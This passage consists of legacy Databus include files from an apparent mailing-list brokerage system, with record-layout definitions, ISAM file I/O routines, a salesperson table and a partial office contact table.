.END PATCH 1.1 - REPLACED LOGIC
.begin patch 1.2
.Strack DIM 15 065-079 Tracking number
Strack DIM 25 065-089 Tracking number
.end patch 1.2
SINITS DIM 3 090-092 Initials of person who created record
SRDATE DIM 8 093-100 Date record was created
SPINITS DIM 3 101-103 Initials of person who Printed record
SPDATE DIM 8 104-111 Date record was Printed
SFILLER DIM 25 112-136 Filler
listend
.
..............................................................................
<file_sep>/include/NESCDD.INC
******************************************************************************
*VARIABLE INCLUSION FOR CLIENT ESCROW FILE
******************************************************************************
* FILE: ESCROW
* RECORD SIZE:
* COMPRESS: NONE
* TYPE: ISAM
* KEY: 1 MLR/broker NUMBER 1-12
* KEY: 2 OWNER/list NUMBER 13-18,19-24
******************************************************************************
. Patch 1.1 01/10/2005 ASH Converted Mailer/Broker fields
.patch 1.2 add type of escrow DLH
.
.START PATCH 1.1 REPLACED LOGIC
.NESCFILE IFILE KEYLEN=8,dup
.NESCFLE2 IFILE KEYLEN=10,FIXED=18
..
.NESCFLAG FORM 1
.NESCFLG2 FORM 1
.NESCPATH FORM 1
.NESCNAME INIT "ESCROW "
.NESCNME2 INIT "ESCROW2 "
..
.NESCFLD DIM 8
.NESCFLD2 DIM 10
..
.NESCMLR DIM 4 1-4 MAILER
.NESCBRK DIM 4 5-8 BROKER NUMBER
.NESCOWN DIM 4 9-12 OWNER
.NESClist DIM 6 13-18 list #
............................................................................
NEscFlist Filelist
NESCFILE IFILE KEYLEN=12,dup,Name="Escrow.ISI|NINS1:502"
NESCFLE2 IFILE KEYLEN=12,FIXED=60,Name="Escrow2.ISI|NINS1:502"
FILELISTEND
.
NESCFLAG FORM 1
NESCFLG2 FORM 1
NESCPATH FORM 1
NESCNAME INIT "ESCROW "
NESCNME2 INIT "ESCROW2 "
.
NESCFLD DIM 12
NESCFLD2 DIM 12 .owner & list
NESCLOck FORM 1 0 OR 1=filepi,2=recordlock, 3=no lock
.
Nescvars List
NESCMLR DIM 6 1-6 MAILER
NESCBRK DIM 6 7-12 BROKER NUMBER
NESCOWN DIM 6 13-18 OWNER
NESClist DIM 6 19-24 list #
NEscBDate Dim 8 25-32 Begin date --- not yet implemented
NEscSDate Dim 8 33-40 Stop date --- not yet implemented
.begin patch 1.2
NescType Dim 1 41-41 '2' = Paid Monthly '1'= quarterly '3' = Acquisition
NescFill Dim 19 42-60
Listend
.end patch 1.2
.END PATCH 1.1 REPLACED LOGIC
<file_sep>/include/oslspern.inc
.; Last change: JD 11 May 2007 Added <NAME>
.; Last change: JD 23 Apr 2007 Added <NAME>
.; Last change: JD 23 Apr 2007 Added <NAME>
.; Last change: JD 08 Mar 2007 Added Gayle,<NAME>,Thay
.; Last change: JD 26 Feb 2007 Added Karla,Pam,Demaris PL
.; Last change: JD 29 Dec 2006 Added <NAME> to #12
.; Last change: JD 05 Jul 2006 Added <NAME> to #15.
.; Last change: JD 14 Mar 2006 Added TF to #17.
.; Last change: DM 07 Nov 2005 Changed BC's old #13 to AK
.; Last change: JD 06 Sep 2005 Added CB # 15..
.; Last change: JD 04 Apr 2005 BLO,SK,JC,BS turned off.
.; Last change: JD 31 Jan 2002 8:10 am
.; 14Apr04 added sk to sls19 listmgmt.
.; 15Mar05 added DC to sls12 brokerage.
*..............................................................................
* OSLSPERN/INC - ORDER SALES PERSON TABLE. 21OCT87
* variables should be padded out to 25 to avoid pcbus problem
* Any changes here also need to be made in Ncnt0001
*..............................................................................
OSLS0 INIT "no salesperson "
OSLS1 INIT "<NAME> "
.OSLS1 INIT "<NAME> " started 11/17/03
.OSLS1 INIT "<NAME>. " left 11/2001
.OSLS2 INIT "Bonnie " Left 11/2003
OSLS2 INIT "<NAME> - LM "
OSLS3 INIT "<NAME> "
.OSLS4 INIT "<NAME> "
OSLS4 INIT "<NAME> " .2015 May 20
.OSLS5 INIT "<NAME> " .start 02/07
OSLS5 INIT "<NAME> " .start 2015
.OSLS5 INIT "<NAME> " .left 12/06
OSLS6 INIT "List Management " .7/90
.OSLS7 INIT "<NAME> " Left 12/2004
OSLS7 INIT "<NAME> " .added 10/07/15
.OSLS8 INIT "Jeanette " Left 12/2004
OSLS8 INIT "<NAME> " .added 25June2010
OSLS9 INIT "Cold calls "
OSLS10 INIT "<NAME> "
.OSLS10 INIT "<NAME> " left 4/99.
.OSLS11 INIT "<NAME> " Left 12/2004
OSLS11 INIT "<NAME> " left 9/25/2015
.OSLS11 INIT " "
OSLS12 INIT "<NAME> " started 2/07
.OSLS12 INIT "<NAME> "
.OSLS12 INIT "<NAME> " started 03/05
.OSLS12 INIT "<NAME> "
OSLS13 INIT "<NAME> " .Married 10/07
.OSLS13 INIT "<NAME> " .start 02/07
.OSLS13 INIT "<NAME> "
.OSLS13 INIT "<NAME> "
.OSLS13 INIT " "
OSLS14 INIT "<NAME> "
OSLS15 INIT "<NAME> " started 05/06
.OSLS15 INIT "<NAME> " started 09/05
.oSLS15 INIT "<NAME> " *fixed by dh 1/10
OSLS16 INIT "<NAME> "
OSLS17 INIT "<NAME> " started 03/14/06
OSLS18 INIT "<NAME> " started 03/06
.OSLS19 INIT "<NAME> " ***************OSLS19 reserved for list management only!!!!!!!!!!!!!!!!!!!!!!
OSLS19 INIT "<NAME> " ***************OSLS19 reserved for list management only!!!!!!!!!!!!!!!!!!!!!!
OSLS20 INIT "<NAME> "
OSLS21 INIT "<NAME> "
.OSLS22 INIT "<NAME> " left 8/99
OSLS22 INIT "<NAME> "
.OSLS23 INIT "<NAME> "
OSLS23 INIT "<NAME> " .July 15 2015
OSLS24 INIT "<NAME> "
OSLS25 INIT "<NAME> "
OSLS26 INIT "<NAME> "
.OSLS27 INIT "<NAME> " 2/1/08
OSLS27 INIT "List Management-NIN/PLI "
OSLS28 INIT "<NAME> "
OSLS29 INIT "<NAME> "
.OSLS30 INIT "<NAME> " .reserved for LM
OSLS30 INIT "<NAME>(LM) " .2015 Mar 13 .reserved for LM
OSLS31 INIT "<NAME> " .added 12/17/08
OSLS32 INIT "<NAME> " .added 04/25/2012
OSLS33 INIT " "
OSLS34 INIT " "
OSLS35 INIT "Imported PL Brokerage "
.OSLS1 INIT "ardis "
.OSLS1 INIT " "
.OSLS1 INIT "lisa" left in 1/91.
.OSLS4 INIT "Elaine "
.OSLS5 INIT "Nancy " started april 90
.OSLS5 INIT "kevin " 02/90 left niN
.OSLS6 INIT "ines " not in list mAN.
.OSLS7 INIT "patrick "
.OSLS7 INIT "<NAME>." 04/90 left nin
.OSLS7 INIT "<NAME>" 11/91 left nin
.OSLS7 INIT "meg " 07/93 left sales.
.OSLS7 INIT "julie " started sales person.9/93.
.OSLS7 INIT "<NAME> " started sales person.1/94.
.OSLS9 INIT "cheryl"
.OSLS9 INIT "<NAME>." 02/90 left nin
.OSLS9 INIT "tina maultsby" left 6/90???
.OSLS9 INIT "marguerite salmon" as of 9/13/90, lefT 11/21/90
.OSLS9 INIT "ines" left 3/15/91
.OSLS10 INIT "glendi" left 7/90
.OSLS11 INIT "<NAME> "
.OSLS11 INIT "<NAME>. " 1/93 left nin
.OSLS12 INIT "<NAME>." 07/89 left nin
.OSLS12 INIT "james" 09/90 left 3/92
.OSLS12 INIT "<NAME> "
.OSLS12 INIT "<NAME> " left 10/98
.OSLS13 INIT "regina"
.OSLS13 INIT "jone" 02/90 left nin
.OSLS13 INIT "<NAME>" moved to ssg 7/90
.OSLS13 INIT "<NAME> "
.OSLS15 INIT "<NAME>." 04/90 left nin
.OSLS15 INIT "<NAME> " left 12/98 *fixed by dh 1/10
. *dont change it!
.OSLS16 INIT "larry" 10/89 left nin
.OSLS16 INIT "rebecca "
.OSLS17 INIT "elizabeth" 04/90 left nin
.OSLS17 INIT "<NAME> "
.OSLS18 INIT "yolanda " 08/89 left niN
.OSLS18 INIT "beth" 12/91 letf nin
.***************OSLS19 reserved for list management only!!!!!!!!!!!!!!!!!!!!!!
.OSLS19 INIT "<NAME>." 04/91 left nin
.............................................................................
.OSLS20 INIT "<NAME>" moved to ssg 7/90
.OSLS21 INIT "laurie" 7/91 letf nin
.OSLS22 INIT "sonya brown" left 3/92
.OSLS23 INIT " "
.OSLS24 INIT " "
.OSLS25 INIT " "
.OSLS26 INIT " "
.OSLS27 INIT " "
.OSLS28 INIT " "
.OSLS29 INIT " "
...............................................................................
.ANY CHANGES IN THIS table need to will change table in salesprT. AFTER
.PARAGRAPH READ2.
...............................................................................
<file_sep>/include/nord6io.inc
;..............................................................................
;
; NORD6IO INCLUSION
; NIN RECORD NUMBER IO INCLUSION
;
; FILE NAME : NINORD6
;
;
;.............................................................................
;
NORD6KEY
BRANCH NORD6FLAG OF NORD61
CALL NORD6OPEN
NORD61 TRAP IOMssg Giving Error if IO
branch NORD6lock to NOR61L,NOR61R,NOR61N
NOR61L FILEPI 1;NORD6FILE
READ NORD6FILE,NORD6FLD;ORD6VARS
TRAPCLR IO
RETURN
NOR61R
READLK NORD6FILE,NORD6FLD;ORD6VARS
TRAPCLR IO
RETURN
NOR61N
READ NORD6FILE,NORD6FLD;ORD6VARS
TRAPCLR IO
RETURN
;.............................................................................
;
; ENTRY POINT : NORD6TST
; REQUIRED : NORD6FLD
; RETURNED :
; DESCRIPTION : TEST KEY
;
NORD6TST BRANCH NORD6FLAG TO NORD62
CALL NORD6OPEN
NORD62 TRAP IOMssg Giving Error if IO
branch NORD6lock to NOR62L,NOR62R,NOR62N
NOR62L FILEPI 1;NORD6FILE
READ NORD6FILE,NORD6FLD;;
TRAPCLR IO
RETURN
NOR62R
READLK NORD6FILE,NORD6FLD;;
TRAPCLR IO
RETURN
NOR62N
READ NORD6FILE,NORD6FLD;;
TRAPCLR IO
RETURN
;.............................................................................
;
; ENTRY POINT : NORD6KS
; REQUIRED :
; RETURNED : RECORD NUMBER RECORD
; DESCRIPTION : KEY SEQUENTIAL RECORD NUMBER FILE READ
;
NORD6KS BRANCH NORD6FLAG TO NORD63
CALL NORD6OPEN
NORD63 TRAP IOMssg Giving Error if IO
branch NORD6lock to NOR63L,NOR63R,NOR63N
NOR63L FILEPI 1;NORD6FILE
READKS NORD6FILE;ORD6VARS
TRAPCLR IO
RETURN
NOR63R
READKSLK NORD6FILE;ORD6VARS
TRAPCLR IO
RETURN
NOR63N
READKS NORD6FILE;ORD6VARS
TRAPCLR IO
RETURN
;.............................................................................
;
; ENTRY POINT : NORD6SEQ
; REQUIRED :
; RETURNED : RECORD NUMBER RECORD
; DESCRIPTION : SEQUENTIAL RECORD NUMBER FILE READ
; APPLICATION'S RESPONSIBILITY TO TEST FLAGS
;
NORD6SEQ BRANCH NORD6FLAG TO NORD64
CALL NORD6OPEN
NORD64 TRAP IOMssg Giving Error if IO
branch NORD6lock to NOR64L,NOR64R,NOR64N
NOR64L FILEPI 1;NORD6FILE
READ NORD6FILE,SEQ;ORD6VARS
TRAPCLR IO
RETURN
NOR64R
READLK NORD6FILE,SEQ;ORD6VARS
TRAPCLR IO
RETURN
NOR64N
READ NORD6FILE,SEQ;ORD6VARS
TRAPCLR IO
RETURN
;.............................................................................
;
; ENTRY POINT : NORD6WRT
; REQUIRED : 'NORD6FLD'
; RETURNED :
; DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
;
NORD6WRT BRANCH NORD6FLAG TO NORD65
CALL NORD6OPEN
NORD65 TRAP IOMssg Giving Error if IO
FILEPI 1;NORD6FILE
WRITE NORD6FILE,NORD6FLD;ORD6VARS
trapclr IO
RETURN
;.............................................................................
;
; ENTRY POINT : NORD6UPD
; REQUIRED : A PREVIOUS KEY READ
; RETURNED :
; DESCRIPTION : KEY UPDATE RECORD NUMBER FILE
;
NORD6UPD BRANCH NORD6FLAG TO NORD66
CALL NORD6OPEN
NORD66 TRAP IOMssg Giving Error if IO
FILEPI 1;NORD6FILE
UPDATE NORD6FILE;ORD6VARS
trapclr IO
RETURN
;.............................................................................
;
; ENTRY POINT : NORD6DEL
; REQUIRED : 'NORD6FLD'
; RETURNED :
; DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
;
NORD6DEL BRANCH NORD6FLAG TO NORD67
CALL NORD6OPEN
NORD67 TRAP IOMssg Giving Error if IO
FILEPI 1;NORD6FILE
DELETE NORD6FILE,NORD6FLD
trapclr IO
RETURN
;...............................................................................
;
; ENTRY POINT : NORD6OPEN
; REQUIRED : 'NORD6FLAG'
; RETURNED : 'NORD6FLAG' SET TO '1' IF OPENNED
; DESCRIPTION : OPEN NIN RECORD NUMBER FILE
; DISPLAY ERROR AND ABORT IF NOT ON-LINE.
;
NORD6OPEN TRAP NORD6GONE IF IO
OPEN NORD6FILE,NORD6NAME
TRAPCLR IO
MOVE C1 TO NORD6FLAG
RETURN
;
NORD6GONE MOVE NORD6NAME TO FILENAME
CALL FILEGONE
;
;.............................................................................
<file_sep>/include/nord7io.inc
;..............................................................................
;
; nord7IO INCLUSION
; NIN RECORD NUMBER IO INCLUSION
;
; FILE NAME : NInord7
;
;
;.............................................................................
;
nord7KEY
BRANCH nord7FLAG OF nord71
CALL nord7OPEN
nord71 TRAP IOMssg Giving Error if IO
branch nord7lock to NOR61L,NOR61R,NOR61N
NOR61L FILEPI 1;nord7FILE
READ nord7FILE,nord7FLD;ord7VARS
TRAPCLR IO
RETURN
NOR61R
READLK nord7FILE,nord7FLD;ord7VARS
TRAPCLR IO
RETURN
NOR61N
READ nord7FILE,nord7FLD;ord7VARS
TRAPCLR IO
RETURN
;.............................................................................
;
; ENTRY POINT : nord7TST
; REQUIRED : nord7FLD
; RETURNED :
; DESCRIPTION : TEST KEY
;
nord7TST BRANCH nord7FLAG TO nord72
CALL nord7OPEN
nord72 TRAP IOMssg Giving Error if IO
branch nord7lock to NOR62L,NOR62R,NOR62N
NOR62L FILEPI 1;nord7FILE
READ nord7FILE,nord7FLD;;
TRAPCLR IO
RETURN
NOR62R
READLK nord7FILE,nord7FLD;;
TRAPCLR IO
RETURN
NOR62N
READ nord7FILE,nord7FLD;;
TRAPCLR IO
RETURN
;.............................................................................
;
; ENTRY POINT : nord7KS
; REQUIRED :
; RETURNED : RECORD NUMBER RECORD
; DESCRIPTION : KEY SEQUENTIAL RECORD NUMBER FILE READ
;
nord7KS BRANCH nord7FLAG TO nord73
CALL nord7OPEN
nord73 TRAP IOMssg Giving Error if IO
branch nord7lock to NOR63L,NOR63R,NOR63N
NOR63L FILEPI 1;nord7FILE
READKS nord7FILE;ord7VARS
TRAPCLR IO
RETURN
NOR63R
READKSLK nord7FILE;ord7VARS
TRAPCLR IO
RETURN
NOR63N
READKS nord7FILE;ord7VARS
TRAPCLR IO
RETURN
;.............................................................................
;
; ENTRY POINT : nord7SEQ
; REQUIRED :
; RETURNED : RECORD NUMBER RECORD
; DESCRIPTION : SEQUENTIAL RECORD NUMBER FILE READ
; APPLICATION'S RESPONSIBILITY TO TEST FLAGS
;
nord7SEQ BRANCH nord7FLAG TO nord74
CALL nord7OPEN
nord74 TRAP IOMssg Giving Error if IO
branch nord7lock to NOR64L,NOR64R,NOR64N
NOR64L FILEPI 1;nord7FILE
READ nord7FILE,SEQ;ord7VARS
TRAPCLR IO
RETURN
NOR64R
READLK nord7FILE,SEQ;ord7VARS
TRAPCLR IO
RETURN
NOR64N
READ nord7FILE,SEQ;ord7VARS
TRAPCLR IO
RETURN
;.............................................................................
;
; ENTRY POINT : nord7WRT
; REQUIRED : 'nord7FLD'
; RETURNED :
; DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
;
nord7WRT BRANCH nord7FLAG TO nord75
CALL nord7OPEN
nord75 TRAP IOMssg Giving Error if IO
FILEPI 1;nord7FILE
WRITE nord7FILE,nord7FLD;ord7VARS
trapclr IO
RETURN
;.............................................................................
;
; ENTRY POINT : nord7UPD
; REQUIRED : A PREVIOUS KEY READ
; RETURNED :
; DESCRIPTION : KEY UPDATE RECORD NUMBER FILE
;
nord7UPD BRANCH nord7FLAG TO nord76
CALL nord7OPEN
nord76 TRAP IOMssg Giving Error if IO
FILEPI 1;nord7FILE
UPDATE nord7FILE;ord7VARS
trapclr IO
RETURN
;.............................................................................
;
; ENTRY POINT : nord7DEL
; REQUIRED : 'nord7FLD'
; RETURNED :
; DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
;
nord7DEL BRANCH nord7FLAG TO nord77
CALL nord7OPEN
nord77 TRAP IOMssg Giving Error if IO
FILEPI 1;nord7FILE
DELETE nord7FILE,nord7FLD
trapclr IO
RETURN
;...............................................................................
;
; ENTRY POINT : nord7OPEN
; REQUIRED : 'nord7FLAG'
; RETURNED : 'nord7FLAG' SET TO '1' IF OPENNED
; DESCRIPTION : OPEN NIN RECORD NUMBER FILE
; DISPLAY ERROR AND ABORT IF NOT ON-LINE.
;
nord7OPEN TRAP nord7GONE IF IO
OPEN nord7FILE,nord7NAME
TRAPCLR IO
MOVE C1 TO nord7FLAG
RETURN
;
nord7GONE MOVE nord7NAME TO FILENAME
CALL FILEGONE
;
;.............................................................................
<file_sep>/include/NACDDD.inc
. .............................................................................
. VARIABLE DATA DEFINITIONS FOR NINACD/TXT.
. .........................................
.patch 2.01 DLH 05Nov2003
.patch 2.0 DLH Apr99 3 byte key/code
NACDFILE IFILE KEYLEN=3,FIXED=65
NACDNAME INIT "NINACD|NINS1:502 "
NACDFLAG FORM 1
NACDFLD DIM 3
.
NacdVars List
NACDKEY DIM 3 1-3 000-999.
NACDTEXT DIM 35 4-38 FREE FORM TEXT.
;begin patch 2.01
NacdFILL1 Dim 5 39-43 Not used (reserved to expand text)
NacdType Dim 1 44-44 ' ' = special, 'm' = per thousand 'f' = flat
NacdFill2 Dim 21 45-65
;NACDFILL DIM 27 39-65 NOT USED.
Listend
;end patch 2.01
.
..............................................................................
<file_sep>/include/NMLDDD.INC
......................................
.NMLDDD INCLUSION
.NINMLD file for Tracking changes in Mail Dates in NINORD
.
.FILE NAME: NINMLD
.REC LENGTH: 58 FIXED
.INDEX KEY: (1) 1-6 (LR#)
. 7-22 (Timestamp)
.
.AAMDEX KEY: (1) 1-6 (LR#)
; PATCH 1.1 DMB 18JUN2005 Changed IP of File Manager
.
.>Patch 1.1 Begin
.NMLDNAME INIT "NINMLD.ISI|20.20.30.103:502"
NMLDNAME INIT "NINMLD.ISI|NINS1:502"
.
NMLDFLIST FILELIST
.NMLDFILE IFILE KEYLEN=22,FIXED=58,Name="NINMLD.ISI|20.20.30.103:502"
NMLDFILE IFILE KEYLEN=22,FIXED=58,Name="NINMLD.ISI|NINS1:502"
.NMLDFLE2 AFILE FIXED=58,Name="NINMLD.AAM|20.20.30.103:502"
NMLDFLE2 AFILE FIXED=58,Name="NINMLD.AAM|NINS1:502"
FILELISTEND
.>Patch 1.1 End
.
NMLDFLD DIM 22
NMLDFLD1 DIM 9
NMLDFLAG FORM 1
NMLDPATH FORM 1
NMLDLOCK FORM 1
.
NMLDVARS list
NMLDLR DIM 6 001-006 LR from NINORD (ISI/AAM)
NMLDTIME DIM 16 007-022 Timestamp MailDate was changed from NMLDDATE to it's new value (ISI)
NMLDDATE DIM 8 023-030 Last MailDate prior to change
NMLDINIT DIM 3 031-033 Initials of USER who made this change
NMLDFILL DIM 25 034-058 Filler
listend
<file_sep>/include/M2NLOdd.inc
.* MIN 2 NIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. FILE: MIN2NINLO
. LENGTH: Fixed
. COMPRESS: NONE
. TYPE: Isam fixed
......................................................
. LAST MODIFIED
. patch 1.0 20 November 2006 DLH New
.Main file
.MDCMaindd
.Secondary FIles See
.MDCSEGDD - Segment info universe & $
.MDSMSCDD - Misc addressing Min, UOS,Gender,Media,net
.MDCTXTDD - CAtegory
.MDC091DD - Owner ???? data no supplied
.MDCTXTDD - Owner
.MDCTXTDD - Text
.M2nLodd - list owner xref
......................................................
M2NLONAME INit "Min2NinLO "
M2nLOFlist Filelist
M2NLOFILE IFILE Name="Min2ninLo.Isi|NINS1:502"
M2NLOFILE2 IFILE Name="Min2ninLo2.Isi|NINS1:502"
FileListEnd
M2NLOFLAG FORM 1
M2NLOPATH FORM 1
M2NLOFld Dim 6
M2NLOFld2 Dim 6
.
M2NLOVARS LIST .
M2NLOMin Dim 6 1-6 right justified 5 byte owner code
M2NLOFill1 dim 1 7-7 Not USed
M2NLONIN DIM 6 8-13 Owner #
ListEnd
<file_sep>/include/ndatdd.inc
******************************************************
* DATACARD FILE DESCRIPTOR.
. ....................................................
* ****************************************************
* NAMES IN THE NEWS MASTER DATACARD FILE.
* ****************************************************
.
. FILE: NINDAT
. LENGTH: 600
. COMPRESS: NONE
. TYPE: AIM,ISAM,MANAGED
. INDEX KEY: 2-7 LSTNUM
. 64-138 MLSTNAME
.AIMDEX KEY: 2-7 LSTNUM
. 64-138 MLSTNAME
. 14-19 DATFUL
. 1-1 STATUS
. 32-32 NEW BYTE
. 33-33 EXCLUSIVE BYTE
.Begin patch 1.83
. 8-13 List owner
. 14-19 Service B.
.end patch 1.83
......................................................
. LAST MODIFIED
.patch 1.83 2014 July add owner and SB as aam keys
.patch 1.82 2014 July add flags counts,blocked dates,gender
.patch 1.81 2014 April add LRA month day of renewal
.patch 1.8 2013 Oct 18 track if LRA required
.Patch 1.7 28August2012 DLH - add Ifile Nindat5 key=list # only if elstcde <> " "
.Patch 1.6 23Feb2009 DLH - List clearance delivery preference " " = none use presence of fax/email to determine '1'=fax, '2'=email
. Note if ' ' and email address is present that is the default
. patch 1.5 30May2008 DLH - Quick reco file for WEb
. patch 1.4 12September2006 DLH - Fulfillment & Min Changes
. patch 1.3 29JUNE2006 DMS - Add search, as per 6/12/2006 CTF Meeting
. patch 1.2 21JUNE2006 ASH - Added aamdex for Fulfillment Number
. - 06Jul04 DLH Added NDatLUsage
. - 29Jul02 ASH Began conversion Process
.Secondary FIles See
. include ntxtdd.inc - DATACARD TEXT FILE
. include nadddd.inc - address codes
. include narrdd.inc - Arrangement codes
. include ncatdd.inc - CATEGORY FILE DESCRIPTOR.
. include NSLTdd.inc - SELECTION CODE FILE DESCRIPTOR.
. include nsrcdd.inc - SOURCE CODE FILE DESCRIPTOR.
. include nmoddd.inc - PRICE MODIFIER FILE DESCRIPTOR.
. include nusedd.inc - VARIaBLES MODULE FOR DATABUS PORT/USER IDENTIFICATION.
. INclude NMDCMsc.inc - additional info (currently from MIN) need to incorporate
. INClude NMDCCAT.inc - Min Category
.begin patch 1.5
. INclude NQRCdd.inc - quick reco for web
.end patch 1.5
.
. - 18JUN2005 DMB IP Address changed for File Manager
. - 06Apr2005 ASH Modifed COMMPER
. - 15Nov95 DLH add key by name
. - 12/10/85 ADDED ONE BYTE TO EACH CATEGORY CODE, DELETED
. BLANK8. RECORD SIZE NOW VARIABLE TO MAX 2813.
......................................................
NDATNAME DIM 35
NDATNME1 INIT "NINDAT|NINS1:502 "
NDATNME2 INIT "NINDAT|NINS1:502 "
NDATNME3 INIT "NINDAT4|NINS1:502 " nindat3 is used for tdmc info (argh)
NdatNME4 Init "NINDAT5|NINS1:502 " (argh) see above only Manage files
NDATFLIST FILELIST
NDATFILE IFILE KEYLEN=6,FIXED=600,Name="NINDAT.ISI|NINS1:502"
NDATFLE2 AFILE FIXED=600,Name="NINDAT.AAM|NINS1:502"
NDATFLE3 IFILE KEYLEN=75,FIXED=600,Name="NINDAT4.ISI|NINS1:502"
NDATFLE4 Ifile KEYLEN=6,FIXED=600,Name="NINDAT5.ISI|NINS1:502" .only Managed lists
.NDATFILE IFILE KEYLEN=6,FIXED=600,Name="NINDAT.ISI|20.20.30.103:502"
.NDATFILE IFILE KEYLEN=6,FIXED=600,Name="NINDAT.ISI"
.NDATFLE3 IFILE KEYLEN=55,FIXED=600,Name="NINDAT4.ISI|20.20.30.103:502"
.NDATFLE3 IFILE KEYLEN=55,FIXED=600,Name="NINDAT4.ISI"
.NDATFLE2 AFILE FIXED=600,Name="NINDAT.AAM|20.20.30.103:502"
.NDATFLE2 AFILE FIXED=600,Name="NINDAT.AAM"
FILELISTEND
NDATLOCK FORM 1 0 OR 1=filepi,2=recordlock, 3=no lock
NDATFLD DIM 6
NDATFLD1 DIM 9
NDATFLD2 DIM 78
NDATFLD3 DIM 75
.START PATCH 1.2 ADDED LOGIC
NDATFLD4 DIM 9
.END PATCH 1.2 ADDED LOGIC
.START PATCH 1.3 ADDED LOGIC
NDATFLD5 DIM 4
NDATFLD6 DIM 4
.Begin patch 1.83
.NDATFLD7 DIM 4
.END PATCH 1.3 ADDED LOGIC
NDATFLD7 DIM 9
NDATFLD8 DIM 9
.end patch 1.83
NDATFLAG FORM 1
NDATPATH FORM 1
.
DATVARS LIST
STATUS DIM 1 1-1 'W' FOR WITHDRAWN.
LSTNUM DIM 6 2-7 ZERO FILLED KEY.
OWNNUM DIM 6 8-13 OWNER NUMBER (KEY FOR NINOWN FILES)
DATFUL DIM 6 14-19 FULFILLMENT NUMBER
DATMAN DIM 6 20-25 MANAGER
DATMLR DIM 6 26-31 MAILER THIS WOULD NEGATE THE NEED FOR NINXRF.DAT!!!!!!!!!!
NLSTCDE DIM 1 32-32 NEW LIST CODE (Y or N).
ELSTCDE DIM 1 33-33 Management CODE (N, C, P, or ).
. 'N' = NEW YORK, 'C'=CALIFORNIA, 'P'=Pacific Lists, ' ' NOT Managed in house
OLDCOMMPER DIM 3 34-36 COMMISSION. OBSOLETE FOR ALL NEWLY COMPILED PROGRAMS AS OF 4/6/2005
HOTLINE DIM 1 37-37 HOTLINE CODE (Y or N).
NEWDATE DIM 8 38-45 DATE CARD PUT UP CCYYMMDD FORMAT
REVDATE DIM 8 46-53 REVISION DATE CCYYMMDD FORMAT - PRINTED ON DATACARD data update date
PASSWORD DIM 10 54-63 WHOM LAST UPDATED CARD - PRINTED ON DATACARD
MLSTNAME DIM 75 64-138 MASTER LIST NAME.
OLSTNAME DIM 35 139-173 ORDER LIST NAME.
CLEANCDE DIM 4 174-177 CLEANED CODE (Cxxx).
CLNINFO DIM 38 178-215 CLEAN INFORMATION.
NETNAME DIM 4 216-219 NET NAME CODE (Nxxx).
NETINFO DIM 38 220-257 NET NAME INFORMATION.
DELCODE DIM 4 258-261 DELIVERY CODE (Dxxx).
SAMPLE DIM 4 262-265 SAMPLE CODE (Pxxx).
SEX DIM 15 266-280 SEX TEXT. OFF 1 BYTE
MIN DIM 11 281-291 MINIMUM TEXT.
UNIVERSE DIM 10 292-301 UNIVERSE QUANTITY.
DATPAY DIM 6 302-307 PAY-TO NUMBER.
NDATCONV DIM 1 308-308 CONVERSION BYTE
NDATEXCH DIM 1 309-309 1 = EITHER, 2 = EXCHANGE ONLY, 3 = RENTAL ONLY -- OBSOLETE!!! USING BYTE IN NINSEL INSTEAD
UNITDATA DIM 188 310-497
NDATWEB DIM 1 498-498 ' ' =ALLOWED ON WEBSITE 1=Do not post
NDATOFF DIM 1 499-499 1=OFFICE USE ONLY
NDATUPDDATE DIM 8 500-507 UPDATE DATE touched date
NDATUPDINIT DIM 10 508-517 UPDATE INITS
NDATBUSY DIM 1 518-518
NDatLUSAGE DIM 1 519-519 ; 'F' If we cannot share list usage info
COMMPER DIM 6 520-525 COMMISSION.
NDATVerf Dim 8 526-533 Date info last confirmed data
NDATNUPD Dim 8 534-541
NdatMen form 3.2 542-547 percent men
NdatFem Form 3.2 548-553 percent female
NdatOldOwn Dim 6 554-559 Holds old manager / owner number if change occured
.begin patch 1.6
NDatLCFlag Dim 1 560-560 how to send lcr's " " use presence of email/fax# 1=fax, 2 = email
.begin patch 1.8
.NDatFill Dim 40 561-600
NDATLRA Dim 1 561-561
.begin patch 1.81
NDatLRADte Dim 2 562-563 .month of renewal
.begin patch 1.82
ndatFlag1 Dim 1 564-564 .y=blocked dates
ndatflag2 dim 1 565-565 .y=Gender
Ndatflag3 dim 1 566-566 .y=counts
Ndatflag4 dim 1 567-567 .y=mailer restrictions
NDatFill Dim 33 568-600
.NDatFill Dim 37 564-600
.NDatFill Dim 39 562-600
.end patch 1.81
.end patch 1.8
.end patch 1.6
.NDatFill Dim 41 560-600
.NDATFILL DIM 47 553-600 FILLER
.Eventually add following 2 fields:
. Verification Date - Data that List Owner last verified our datacard info
. Verification Schedule - Time frame when we start pestering List Owner about verifying our info.
LISTEND
<file_sep>/include/NSTEIO.INC
..............................................................................
.
. NSTEIO INCLUSION
. NIN STATEMENT FILE IO ROUTINES
.
. FILE NAME : NINSTE
. REC LENGTH: 122
. INDEX KEY :
.
..............................................................................
.
. ENTRY POINT : NSTESEQ
. REQUIRED :
. RETURNED : STATEMENT RECORD
. DESCRIPTION : SEQUENTIAL READ
.
NSTESEQ BRANCH NSTEFLAG TO NSTE3
CALL NSTEOPEN
NSTE3 FILEPI 1;NSTEFILE
READ NSTEFILE,SEQ;STEvars
RETURN
..............................................................................
.
. ENTRY POINT : NSTEOPEN
. REQUIRED : 'NSTEFLAG'
. RETURNED : 'NSTEFLAG' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN STATEMENT FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NSTEOPEN TRAP NSTEGONE IF IO
OPEN NSTEFILE,NSTENAME
TRAPCLR IO
MOVE C1 TO NSTEFLAG
RETURN
NSTEGONE MOVE NSTENAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/Contact1.inc
; Last change: JS 3 Feb 2000 2:54 pm
. .............................................................................
.CONTACT1/INC
. .CONTACT TABLE USED FOR DISPLAY AND PRINT PROGRAMS
.
OCNT DIM 40
OCNT0 INIT "Billing(415) 291-5621"
OCNT1 INIT "<NAME>(415) 291-5637"
OCNT2 INIT "<NAME>(415) 291-5665"
.OCNT2 INIT "jennifer ost" left 9/92
.OCNT2 INIT "<NAME>"
.OCNT3 INIT "<NAME>"
